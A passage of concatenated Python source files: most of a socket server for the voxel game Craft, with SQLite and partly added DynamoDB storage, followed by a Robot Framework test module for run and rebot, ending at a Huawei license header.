48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63])
AUTHENTICATE = 'A'
BLOCK = 'B'
CHUNK = 'C'
DISCONNECT = 'D'
KEY = 'K'
LIGHT = 'L'
NICK = 'N'
POSITION = 'P'
REDRAW = 'R'
SIGN = 'S'
TALK = 'T'
TIME = 'E'
VERSION = 'V'
YOU = 'U'
try:
from config import *
except ImportError:
pass
def log(*args):
now = datetime.datetime.utcnow()
line = ' '.join(map(str, (now,) + args))
print line
with open(LOG_PATH, 'a') as fp:
fp.write('%s\n' % line)
def chunked(x):
return int(floor(round(x) / CHUNK_SIZE))
def packet(*args):
return '%s\n' % ','.join(map(str, args))
class RateLimiter(object):
def __init__(self, rate, per):
self.rate = float(rate)
self.per = float(per)
self.allowance = self.rate
self.last_check = time.time()
def tick(self):
if not RATE_LIMIT:
return False
now = time.time()
elapsed = now - self.last_check
self.last_check = now
self.allowance += elapsed * (self.rate / self.per)
if self.allowance > self.rate:
self.allowance = self.rate
if self.allowance < 1:
return True # too fast
else:
self.allowance -= 1
return False # okay
class Server(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
daemon_threads = True
class Handler(SocketServer.BaseRequestHandler):
def setup(self):
self.position_limiter = RateLimiter(100, 5)
self.limiter = RateLimiter(1000, 10)
self.version = None
self.client_id = None
self.user_id = None
self.nick = None
self.queue = Queue.Queue()
self.running = True
self.start()
def handle(self):
model = self.server.model
model.enqueue(model.on_connect, self)
try:
buf = []
while True:
data = self.request.recv(BUFFER_SIZE)
if not data:
break
buf.extend(data.replace('\r\n', '\n'))
while '\n' in buf:
index = buf.index('\n')
line = ''.join(buf[:index])
buf = buf[index + 1:]
if not line:
continue
if line[0] == POSITION:
if self.position_limiter.tick():
log('RATE', self.client_id)
self.stop()
return
else:
if self.limiter.tick():
log('RATE', self.client_id)
self.stop()
return
model.enqueue(model.on_data, self, line)
finally:
model.enqueue(model.on_disconnect, self)
def finish(self):
self.running = False
def stop(self):
self.request.close()
def start(self):
thread = threading.Thread(target=self.run)
thread.setDaemon(True)
thread.start()
def run(self):
while self.running:
try:
buf = []
try:
buf.append(self.queue.get(timeout=5))
try:
while True:
buf.append(self.queue.get(False))
except Queue.Empty:
pass
except Queue.Empty:
continue
data = ''.join(buf)
self.request.sendall(data)
except Exception:
self.request.close()
#raise
def send_raw(self, data):
if data:
self.queue.put(data)
def send(self, *args):
self.send_raw(packet(*args))
class Model(object):
def __init__(self, seed):
self.world = World(seed)
self.clients = []
self.queue = Queue.Queue()
self.commands = {
AUTHENTICATE: self.on_authenticate,
CHUNK: self.on_chunk,
BLOCK: self.on_block,
LIGHT: self.on_light,
POSITION: self.on_position,
TALK: self.on_talk,
SIGN: self.on_sign,
VERSION: self.on_version,
}
self.patterns = [
(re.compile(r'^/nick(?:\s+([^,\s]+))?$'), self.on_nick),
(re.compile(r'^/spawn$'), self.on_spawn),
(re.compile(r'^/goto(?:\s+(\S+))?$'), self.on_goto),
(re.compile(r'^/pq\s+(-?[0-9]+)\s*,?\s*(-?[0-9]+)$'), self.on_pq),
(re.compile(r'^/help(?:\s+(\S+))?$'), self.on_help),
(re.compile(r'^/list$'), self.on_list),
]
def start(self):
thread = threading.Thread(target=self.run)
thread.setDaemon(True)
thread.start()
def run(self):
self.connection = sqlite3.connect(DB_PATH)
self.create_tables()
self.commit()
while True:
try:
if time.time() - self.last_commit > COMMIT_INTERVAL:
self.commit()
self.dequeue()
except Exception:
traceback.print_exc()
def enqueue(self, func, *args, **kwargs):
self.queue.put((func, args, kwargs))
def dequeue(self):
try:
func, args, kwargs = self.queue.get(timeout=5)
func(*args, **kwargs)
except Queue.Empty:
pass
def execute(self, *args, **kwargs):
return self.connection.execute(*args, **kwargs)
def commit(self):
self.last_commit = time.time()
self.connection.commit()
def create_tables(self):
queries = [
'create table if not exists block ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists block_pqxyz_idx on '
' block (p, q, x, y, z);',
'create table if not exists light ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create unique index if not exists light_pqxyz_idx on '
' light (p, q, x, y, z);',
'create table if not exists sign ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' face int not null,'
' text text not null'
');',
'create index if not exists sign_pq_idx on sign (p, q);',
'create unique index if not exists sign_xyzface_idx on '
' sign (x, y, z, face);',
'create table if not exists block_history ('
' timestamp real not null,'
' user_id int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
]
for query in queries:
self.execute(query)
def get_default_block(self, x, y, z):
p, q = chunked(x), chunked(z)
chunk = self.world.get_chunk(p, q)
return chunk.get((x, y, z), 0)
def get_block(self, x, y, z):
log('get_block')
query = (
'select w from block where '
'p = :p and q = :q and x = :x and y = :y and z = :z;'
)
p, q = chunked(x), chunked(z)
#ddb
#rows = execute_ddb_get_item(dynamodb_client,create_ddb_get_block_type(str(p),str(q),str(x),str(y),str(z)))
rows_ddb = execute_query(dynamodb_client,create_ddb_get_block_type(str(p),str(q),str(x),str(y),str(z)))
log('get block type',dict(p=p, q=q, x=x, y=y, z=z))
log('rows from ddb',rows_ddb['Items'])
rows = list(self.execute(query, dict(p=p, q=q, x=x, y=y, z=z)))
if rows:
log('rows from sqlite',rows[0][0])
return rows[0][0]
return self.get_default_block(x, y, z)
def next_client_id(self):
result = 1
client_ids = set(x.client_id for x in self.clients)
while result in client_ids:
result += 1
return result
def on_connect(self, client):
client.client_id = self.next_client_id()
client.nick = 'guest%d' % client.client_id
#log('CONN', client.client_id, *client.client_address)
client.position = SPAWN_POINT
self.clients.append(client)
client.send(YOU, client.client_id, *client.position)
client.send(TIME, time.time(), DAY_LENGTH)
client.send(TALK, 'Welcome to Craft!')
client.send(TALK, 'Type "/help" for a list of commands.')
self.send_position(client)
self.send_positions(client)
self.send_nick(client)
self.send_nicks(client)
def on_data(self, client, data):
#log('RECV', client.client_id, data)
args = data.split(',')
command, args = args[0], args[1:]
if command in self.commands:
func = self.commands[command]
func(client, *args)
def on_disconnect(self, client):
#log('DISC', client.client_id, *client.client_address)
self.clients.remove(client)
self.send_disconnect(client)
#self.send_talk('%s has disconnected from the server.' % client.nick)
def on_version(self, client, version):
if client.version is not None:
return
version = int(version)
if version != 1:
client.stop()
return
client.version = version
# TODO: client.start() here
def on_authenticate(self, client, username, access_token):
user_id = None
if username and access_token:
payload = {
'username': username,
'access_token': access_token,
}
response = requests.post(AUTH_URL, data=payload)
if response.status_code == 200 and response.text.isdigit():
user_id = int(response.text)
client.user_id = user_id
if user_id is None:
client.nick = 'guest%d' % client.client_id
client.send(TALK, 'Visit craft.michaelfogleman.com to register!')
else:
client.nick = username
self.send_nick(client)
# TODO: has left message if was already authenticated
self.send_talk('%s has joined the game.' % client.nick)
def on_chunk(self, client, p, q, key=0):
packets = []
p, q, key = map(int, (p, q, key))
query = (
'select rowid, x, y, z, w from block where '
'p = :p and q = :q and rowid > :key;'
)
#ddb
#rows print= execute_ddb_get_item(dynamodb_client,create_ddb_get_block_rowid(str(p),str(q),str(key)))
#rows = execute_query(dynamodb_client,create_ddb_get_item(str(p),str(q),str(key)))
rows = self.execute(query, dict(p=p, q=q, key=key))
max_rowid = 0
blocks = 0
for rowid, x, y, z, w in rows:
blocks += 1
packets.append(packet(BLOCK, p, q, x, y, z, w))
max_rowid = max(max_rowid, rowid)
query = (
'select x, y, z, w from light where '
'p = :p and q = :q;'
)
#ddb
#rows = execute_ddb_get_item(dynamodb_client,create_ddb_get_light(str(p),str(q)))
rows = self.execute(query, dict(p=p, q=q))
lights = 0
for x, y, z, w in rows:
lights += 1
packets.append(packet(LIGHT, p, q, x, y, z, w))
query = (
'select x, y, z, face, text from sign where '
'p = :p and q = :q;'
)
#ddb
#rows = execute_ddb_get_item(dynamodb_client,create_ddb_get_sign(str(p),str(q)))
rows = self.execute(query, dict(p=p, q=q))
signs = 0
for x, y, z, face, text in rows:
signs += 1
packets.append(packet(SIGN, p, q, x, y, z, face, text))
if blocks:
packets.append(packet(KEY, p, q, max_rowid))
if blocks or lights or signs:
packets.append(packet(REDRAW, p, q))
packets.append(packet(CHUNK, p, q))
client.send_raw(''.join(packets))
def on_block(self, client, x, y, z, w):
log('on_block','x='+str(x)+'y='+str(y)+'z='+str(z)+'w='+str(w))
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
previous = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif y <= 0 or y > 255:
message = 'Invalid block coordinates.'
elif w not in ALLOWED_ITEMS:
message = 'That item is not allowed.'
elif w and previous:
message = 'Cannot create blocks in a non-empty space.'
elif not w and not previous:
message = 'That space is already empty.'
elif previous in INDESTRUCTIBLE_ITEMS:
message = 'Cannot destroy that type of block.'
if message is not None:
client.send(BLOCK, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert into block_history (timestamp, user_id, x, y, z, w) '
'values (:timestamp, :user_id, :x, :y, :z, :w);'
)
if RECORD_HISTORY:
self.execute(query, dict(timestamp=time.time(),
user_id=client.user_id, x=x, y=y, z=z, w=w))
query = (
'insert or replace into block (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
log('insert into sqlite',str(p)+' '+str(q)+' '+str(x)+' '+str(y)+' '+str(z)+' '+str(w))
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_block(client, p, q, x, y, z, w)
#ddb
log('insert into ddb',str(p)+' '+str(q)+' '+str(x)+' '+str(y)+' '+str(z)+' '+str(w))
execute_ddb_put_item(dynamodb_client, create_ddb_put_item('Block',str(p), str(q), str(x), str(y), str(z), str(w)))
for dx in range(-1, 2):
for dz in range(-1, 2):
if dx == 0 and dz == 0:
continue
if dx and chunked(x + dx) == p:
continue
if dz and chunked(z + dz) == q:
continue
np, nq = p + dx, q + dz
self.execute(query, dict(p=np, q=nq, x=x, y=y, z=z, w=-w))
self.send_block(client, np, nq, x, y, z, -w)
if w == 0:
query = (
'delete from sign where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
query = (
'update light set w = 0 where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
def on_light(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
block = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif block == 0:
message = 'Lights must be placed on a block.'
elif w < 0 or w > 15:
message = 'Invalid light value.'
if message is not None:
# TODO: client.send(LIGHT, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert or replace into light (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_light(client, p, q, x, y, z, w)
#ddb
execute_ddb_put_item(dynamodb_client, create_ddb_put_item('Light',str(p), str(q), str(x), str(y), str(z), str(w)))
def on_sign(self, client, x, y, z, face, *args):
if AUTH_REQUIRED and client.user_id is None:
client.send(TALK, 'Only logged in users are allowed to build.')
return
text = ','.join(args)
x, y, z, face = map(int, (x, y, z, face))
if y <= 0 or y > 255:
return
if face < 0 or face > 7:
return
if len(text) > 48:
return
p, q = chunked(x), chunked(z)
if text:
query = (
'insert or replace into sign (p, q, x, y, z, face, text) '
'values (:p, :q, :x, :y, :z, :face, :text);'
)
self.execute(query,
dict(p=p, q=q, x=x, y=y, z=z, face=face, text=text))
else:
query = (
'delete from sign where '
'x = :x and y = :y and z = :z and face = :face;'
)
self.execute(query, dict(x=x, y=y, z=z, face=face))
self.send_sign(client, p, q, x, y, z, face, text)
def on_position(self, client, x, y, z, rx, ry):
x, y, z, rx, ry = map(float, (x, y, z, rx, ry))
client.position = (x, y, z, rx, ry)
self.send_position(client)
def on_talk(self, client, *args):
text = ','.join(args)
if text.startswith('/'):
for pattern, func in self.patterns:
match = pattern.match(text)
if match:
func(client, *match.groups())
break
else:
client.send(TALK, 'Unrecognized command: "%s"' % text)
elif text.startswith('@'):
nick = text[1:].split(' ', 1)[0]
for other in self.clients:
if other.nick == nick:
client.send(TALK, '%s> %s' % (client.nick, text))
other.send(TALK, '%s> %s' % (client.nick, text))
break
else:
client.send(TALK, 'Unrecognized nick: "%s"' % nick)
else:
self.send_talk('%s> %s' % (client.nick, text))
def on_nick(self, client, nick=None):
if AUTH_REQUIRED:
client.send(TALK, 'You cannot change your nick on this server.')
return
if nick is None:
client.send(TALK, 'Your nickname is %s' % client.nick)
else:
self.send_talk('%s is now known as %s' % (client.nick, nick))
client.nick = nick
self.send_nick(client)
def on_spawn(self, client):
client.position = SPAWN_POINT
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_goto(self, client, nick=None):
if nick is None:
clients = [x for x in self.clients if x != client]
other = random.choice(clients) if clients else None
else:
nicks = dict((client.nick, client) for client in self.clients)
other = nicks.get(nick)
if other:
client.position = other.position
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_pq(self, client, p, q):
p, q = map(int, (p, q))
if abs(p) > 1000 or abs(q) > 1000:
return
client.position = (p * CHUNK_SIZE, 0, q * CHUNK_SIZE, 0, 0)
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_help(self, client, topic=None):
if topic is None:
client.send(TALK, 'Type "t" to chat. Type "/" to type commands:')
client.send(TALK, '/goto [NAME], /help [TOPIC], /list, /login NAME, /logout, /nick')
client.send(TALK, '/offline [FILE], /online HOST [PORT], /pq P Q, /spawn, /view N')
return
topic = topic.lower().strip()
if topic == 'goto':
client.send(TALK, 'Help: /goto [NAME]')
client.send(TALK, 'Teleport to another user.')
client.send(TALK, 'If NAME is unspecified, a random user is chosen.')
elif topic == 'list':
client.send(TALK, 'Help: /list')
client.send(TALK, 'Display a list of connected users.')
elif topic == 'login':
client.send(TALK, 'Help: /login NAME')
client.send(TALK, 'Switch to another registered username.')
client.send(TALK, 'The login server will be re-contacted. The username is case-sensitive.')
elif topic == 'logout':
client.send(TALK, 'Help: /logout')
client.send(TALK, 'Unauthenticate and become a guest user.')
client.send(TALK, 'Automatic logins will not occur again until the /login command is re-issued.')
elif topic == 'offline':
client.send(TALK, 'Help: /offline [FILE]')
client.send(TALK, 'Switch to offline mode.')
client.send(TALK, 'FILE specifies the save file to use and defaults to "craft".')
elif topic == 'online':
client.send(TALK, 'Help: /online HOST [PORT]')
client.send(TALK, 'Connect to the specified server.')
elif topic == 'nick':
client.send(TALK, 'Help: /nick [NICK]')
client.send(TALK, 'Get or set your nickname.')
elif topic == 'pq':
client.send(TALK, 'Help: /pq P Q')
client.send(TALK, 'Teleport to the specified chunk.')
elif topic == 'spawn':
client.send(TALK, 'Help: /spawn')
client.send(TALK, 'Teleport back to the spawn point.')
elif topic == 'view':
client.send(TALK, 'Help: /view N')
client.send(TALK, 'Set viewing distance, 1 - 24.')
def on_list(self, client):
client.send(TALK,
'Players: %s' % ', '.join(x.nick for x in self.clients))
def send_positions(self, client):
for other in self.clients:
if other == client:
continue
client.send(POSITION, other.client_id, *other.position)
def send_position(self, client):
for other in self.clients:
if other == client:
continue
other.send(POSITION, client.client_id, *client.position)
def send_nicks(self, client):
for other in self.clients:
if other == client:
continue
client.send(NICK, other.client_id, other.nick)
def send_nick(self, client):
for other in self.clients:
other.send(NICK, client.client_id, client.nick)
def send_disconnect(self, client):
for other in self.clients:
if other == client:
continue
other.send(DISCONNECT, client.client_id)
def send_block(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(BLOCK, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_light(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(LIGHT, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_sign(self, client, p, q, x, y, z, face, text):
for other in self.clients:
if other == client:
continue
other.send(SIGN, p, q, x, y, z, face, text)
def send_talk(self, text):
log(text)
for client in self.clients:
client.send(TALK, text)
def cleanup():
world = World(None)
conn = sqlite3.connect(DB_PATH)
query = 'select x, y, z from block order by rowid desc limit 1;'
last = list(conn.execute(query))[0]
query = 'select distinct p, q from block;'
chunks = list(conn.execute(query))
count = 0
total = 0
delete_query = 'delete from block where x = %d and y = %d and z = %d;'
print 'begin;'
for p, q in chunks:
chunk = world.create_chunk(p, q)
query = 'select x, y, z, w from block where p = :p and q = :q;'
rows = conn.execute(query, {'p': p, 'q': q})
for x, y, z, w in rows:
if chunked(x) != p or chunked(z) != q:
continue
total += 1
if (x, y, z) == last:
continue
original = chunk.get((x, y, z), 0)
if w == original or original in INDESTRUCTIBLE_ITEMS:
count += 1
print delete_query % (x, y, z)
conn.close()
print 'commit;'
print >> sys.stderr, '%d of %d blocks will be cleaned up' % (count, total)
def main():
if len(sys.argv) == 2 and sys.argv[1] == 'cleanup':
cleanup()
return
host, port = DEFAULT_HOST, DEFAULT_PORT
if len(sys.argv) > 1:
host = sys.argv[1]
if len(sys.argv) > 2:
port = int(sys.argv[2])
log('SERV', host, port)
model = Model(None)
model.start()
server = Server((host, port), Handler)
server.model = model
server.serve_forever()
if __name__ == '__main__':
main()
|
test_run_and_rebot.py
|
import unittest
import time
import glob
import sys
import threading
import tempfile
import signal
import logging
from os.path import abspath, curdir, dirname, exists, join
from os import chdir, getenv
from robot import run, run_cli, rebot, rebot_cli
from robot.model import SuiteVisitor
from robot.running import namespace
from robot.utils import JYTHON, StringIO
from robot.utils.asserts import assert_equal, assert_raises, assert_true
from resources.runningtestcase import RunningTestCase
from resources.Listener import Listener
ROOT = dirname(dirname(dirname(abspath(__file__))))
TEMP = getenv('TEMPDIR', tempfile.gettempdir())
OUTPUT_PATH = join(TEMP, 'output.xml')
REPORT_PATH = join(TEMP, 'report.html')
LOG_PATH = join(TEMP, 'log.html')
LOG = 'Log: %s' % LOG_PATH
def run_without_outputs(*args, **kwargs):
options = {'output': 'NONE', 'log': 'NoNe', 'report': None}
options.update(kwargs)
return run(*args, **options)
def assert_signal_handler_equal(signum, expected):
sig = signal.getsignal(signum)
try:
assert_equal(sig, expected)
except AssertionError:
if not JYTHON:
raise
# With Jython `getsignal` seems to always return different object so that
# even `getsignal(SIGINT) == getsignal(SIGINT)` is false. This doesn't
# happen always and may be dependent e.g. on the underlying JVM. Comparing
# string representations ought to be good enough.
assert_equal(str(sig), str(expected))
class StreamWithOnlyWriteAndFlush(object):
def __init__(self):
self._buffer = []
def write(self, msg):
self._buffer.append(msg)
def flush(self):
pass
def getvalue(self):
return ''.join(self._buffer)
class TestRun(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
warn = join(ROOT, 'atest', 'testdata', 'misc', 'warnings_and_errors.robot')
nonex = join(TEMP, 'non-existing-file-this-is.robot')
remove_files = [LOG_PATH, REPORT_PATH, OUTPUT_PATH]
def test_run_once(self):
assert_equal(run(self.data, outputdir=TEMP, report='none'), 1)
self._assert_outputs([('Pass And Fail', 2), (LOG, 1), ('Report:', 0)])
assert exists(LOG_PATH)
def test_run_multiple_times(self):
assert_equal(run_without_outputs(self.data), 1)
assert_equal(run_without_outputs(self.data, name='New Name'), 1)
self._assert_outputs([('Pass And Fail', 2), ('New Name', 2), (LOG, 0)])
def test_run_fail(self):
assert_equal(run(self.data, outputdir=TEMP), 1)
self._assert_outputs(stdout=[('Pass And Fail', 2), (LOG, 1)])
def test_run_error(self):
assert_equal(run(self.nonex), 252)
self._assert_outputs(stderr=[('[ ERROR ]', 1), (self.nonex, 1),
('--help', 1)])
def test_custom_stdout(self):
stdout = StringIO()
assert_equal(run_without_outputs(self.data, stdout=stdout), 1)
self._assert_output(stdout, [('Pass And Fail', 2), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
self._assert_outputs()
def test_custom_stderr(self):
stderr = StringIO()
assert_equal(run_without_outputs(self.warn, stderr=stderr), 0)
self._assert_output(stderr, [('[ WARN ]', 4), ('[ ERROR ]', 2)])
self._assert_outputs([('Warnings And Errors', 2), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
def test_custom_stdout_and_stderr_with_minimal_implementation(self):
output = StreamWithOnlyWriteAndFlush()
assert_equal(run_without_outputs(self.warn, stdout=output, stderr=output), 0)
self._assert_output(output, [('[ WARN ]', 4), ('[ ERROR ]', 2),
('Warnings And Errors', 3), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
self._assert_outputs()
def test_multi_options_as_single_string(self):
assert_equal(run_without_outputs(self.data, exclude='fail'), 0)
self._assert_outputs([('FAIL', 0)])
def test_listener_gets_notification_about_log_report_and_output(self):
listener = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run(self.data, output=OUTPUT_PATH, report=REPORT_PATH,
log=LOG_PATH, listener=listener), 1)
self._assert_outputs(stdout=[('[output {0}]'.format(OUTPUT_PATH), 1),
('[report {0}]'.format(REPORT_PATH), 1),
('[log {0}]'.format(LOG_PATH), 1),
('[listener close]', 1)])
def test_pass_listener_as_instance(self):
assert_equal(run_without_outputs(self.data, listener=Listener(1)), 1)
self._assert_outputs([("[from listener 1]", 1)])
def test_pass_listener_as_string(self):
module_file = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=module_file+":1"), 1)
self._assert_outputs([("[from listener 1]", 1)])
def test_pass_listener_as_list(self):
module_file = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=[module_file+":1", Listener(2)]), 1)
self._assert_outputs([("[from listener 1]", 1), ("[from listener 2]", 1)])
def test_pre_run_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def start_suite(self, suite):
suite.tests = [t for t in suite.tests if t.tags.match('pass')]
assert_equal(run_without_outputs(self.data, prerunmodifier=Modifier()), 0)
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 0)])
def test_pre_rebot_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def __init__(self):
self.tests = []
def visit_test(self, test):
self.tests.append(test.name)
modifier = Modifier()
assert_equal(run(self.data, outputdir=TEMP, log=LOG_PATH, prerebotmodifier=modifier), 1)
assert_equal(modifier.tests, ['Pass', 'Fail'])
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 1)])
def test_invalid_modifier(self):
assert_equal(run_without_outputs(self.data, prerunmodifier=42), 1)
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 1)],
[("[ ERROR ] Executing model modifier 'integer' "
"failed: AttributeError: ", 1)])
def test_run_cli_system_exits_by_default(self):
exit = assert_raises(SystemExit, run_cli, ['-d', TEMP, self.data])
assert_equal(exit.code, 1)
def test_run_cli_optionally_returns_rc(self):
rc = run_cli(['-d', TEMP, self.data], exit=False)
assert_equal(rc, 1)
class TestRebot(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'rebot', 'created_normal.xml')
nonex = join(TEMP, 'non-existing-file-this-is.xml')
remove_files = [LOG_PATH, REPORT_PATH]
def test_run_once(self):
assert_equal(rebot(self.data, outputdir=TEMP, report='NONE'), 1)
self._assert_outputs([(LOG, 1), ('Report:', 0)])
assert exists(LOG_PATH)
def test_run_multiple_times(self):
assert_equal(rebot(self.data, outputdir=TEMP), 1)
assert_equal(rebot(self.data, outputdir=TEMP, name='New Name'), 1)
self._assert_outputs([(LOG, 2)])
def test_run_fails(self):
assert_equal(rebot(self.nonex), 252)
assert_equal(rebot(self.data, outputdir=TEMP), 1)
self._assert_outputs(stdout=[(LOG, 1)],
stderr=[('[ ERROR ]', 1), (self.nonex, (1, 2)),
('--help', 1)])
def test_custom_stdout(self):
stdout = StringIO()
assert_equal(rebot(self.data, report='None', stdout=stdout,
outputdir=TEMP), 1)
self._assert_output(stdout, [('Log:', 1), ('Report:', 0)])
self._assert_outputs()
def test_custom_stdout_and_stderr_with_minimal_implementation(self):
output = StreamWithOnlyWriteAndFlush()
assert_equal(rebot(self.data, log='NONE', report='NONE', stdout=output,
stderr=output), 252)
assert_equal(rebot(self.data, report='NONE', stdout=output,
stderr=output, outputdir=TEMP), 1)
self._assert_output(output, [('[ ERROR ] No outputs created', 1),
('--help', 1), ('Log:', 1), ('Report:', 0)])
self._assert_outputs()
def test_pre_rebot_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def __init__(self):
self.tests = []
def visit_test(self, test):
self.tests.append(test.name)
test.status = 'FAIL'
modifier = Modifier()
assert_equal(rebot(self.data, outputdir=TEMP,
prerebotmodifier=modifier), 3)
assert_equal(modifier.tests, ['Test 1.1', 'Test 1.2', 'Test 2.1'])
def test_rebot_cli_system_exits_by_default(self):
exit = assert_raises(SystemExit, rebot_cli, ['-d', TEMP, self.data])
assert_equal(exit.code, 1)
def test_rebot_cli_optionally_returns_rc(self):
rc = rebot_cli(['-d', TEMP, self.data], exit=False)
assert_equal(rc, 1)
class TestStateBetweenTestRuns(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'normal.robot')
def test_importer_caches_are_cleared_between_runs(self):
self._run(self.data)
lib = self._import_library()
res = self._import_resource()
self._run(self.data)
assert_true(lib is not self._import_library())
assert_true(res is not self._import_resource())
def _run(self, data, rc=None, **config):
self._clear_outputs()
returned_rc = run_without_outputs(data, outputdir=TEMP, **config)
if rc is not None:
assert_equal(returned_rc, rc)
def _import_library(self):
return namespace.IMPORTER.import_library('BuiltIn', None, None, None)
def _import_resource(self):
resource = join(ROOT, 'atest', 'testdata', 'core', 'resources.robot')
return namespace.IMPORTER.import_resource(resource)
def test_clear_namespace_between_runs(self):
data = join(ROOT, 'atest', 'testdata', 'variables', 'commandline_variables.robot')
self._run(data, test=['NormalText'], variable=['NormalText:Hello'], rc=0)
self._run(data, test=['NormalText'], rc=1)
def test_reset_logging_conf(self):
assert_equal(logging.getLogger().handlers, [])
assert_equal(logging.raiseExceptions, 1)
self._run(join(ROOT, 'atest', 'testdata', 'misc', 'normal.robot'))
assert_equal(logging.getLogger().handlers, [])
assert_equal(logging.raiseExceptions, 1)
def test_listener_unregistration(self):
listener = join(ROOT, 'utest', 'resources', 'Listener.py')
self._run(self.data, listener=listener+':1', rc=0)
self._assert_outputs([("[from listener 1]", 1), ("[listener close]", 1)])
self._run(self.data, rc=0)
self._assert_outputs([("[from listener 1]", 0), ("[listener close]", 0)])
def test_rerunfailed_is_not_persistent(self):
# https://github.com/robotframework/robotframework/issues/2437
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
self._run(data, output=OUTPUT_PATH, rc=1)
self._run(data, rerunfailed=OUTPUT_PATH, rc=1)
self._run(self.data, output=OUTPUT_PATH, rc=0)
assert_equal(rebot(OUTPUT_PATH, log=LOG_PATH, report=None), 0)
class TestTimestampOutputs(RunningTestCase):
output = join(TEMP, 'output-ts-*.xml')
report = join(TEMP, 'report-ts-*.html')
log = join(TEMP, 'log-ts-*.html')
remove_files = [output, report, log]
def test_different_timestamps_when_run_multiple_times(self):
self.run_tests()
output1, = self.find_results(self.output, 1)
report1, = self.find_results(self.report, 1)
log1, = self.find_results(self.log, 1)
self.wait_until_next_second()
self.run_tests()
output21, output22 = self.find_results(self.output, 2)
report21, report22 = self.find_results(self.report, 2)
log21, log22 = self.find_results(self.log, 2)
assert_equal(output1, output21)
assert_equal(report1, report21)
assert_equal(log1, log21)
def run_tests(self):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
assert_equal(run(data, timestampoutputs=True, outputdir=TEMP,
output='output-ts.xml', report='report-ts.html',
log='log-ts'), 1)
def find_results(self, pattern, expected):
matches = glob.glob(pattern)
assert_equal(len(matches), expected)
return sorted(matches)
def wait_until_next_second(self):
start = time.localtime()[5]
while time.localtime()[5] == start:
time.sleep(0.01)
class TestSignalHandlers(unittest.TestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
def test_original_signal_handlers_are_restored(self):
orig_sigint = signal.getsignal(signal.SIGINT)
orig_sigterm = signal.getsignal(signal.SIGTERM)
my_sigterm = lambda signum, frame: None
signal.signal(signal.SIGTERM, my_sigterm)
try:
run_without_outputs(self.data, stdout=StringIO())
assert_signal_handler_equal(signal.SIGINT, orig_sigint)
assert_signal_handler_equal(signal.SIGTERM, my_sigterm)
finally:
signal.signal(signal.SIGINT, orig_sigint)
signal.signal(signal.SIGTERM, orig_sigterm)
def test_dont_register_signal_handlers_when_run_on_thread(self):
stream = StringIO()
thread = threading.Thread(target=run_without_outputs, args=(self.data,),
kwargs=dict(stdout=stream, stderr=stream))
thread.start()
thread.join()
output = stream.getvalue()
assert_true('ERROR' not in output.upper(), 'Errors:\n%s' % output)
class TestRelativeImportsFromPythonpath(RunningTestCase):
data = join(abspath(dirname(__file__)), 'import_test.robot')
def setUp(self):
self._orig_path = abspath(curdir)
chdir(ROOT)
sys.path.append(join('atest', 'testresources'))
def tearDown(self):
chdir(self._orig_path)
sys.path.pop()
def test_importing_library_from_pythonpath(self):
errors = StringIO()
run(self.data, outputdir=TEMP, stdout=StringIO(), stderr=errors)
self._assert_output(errors, '')
if __name__ == '__main__':
unittest.main()
|
test_explain_loader.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
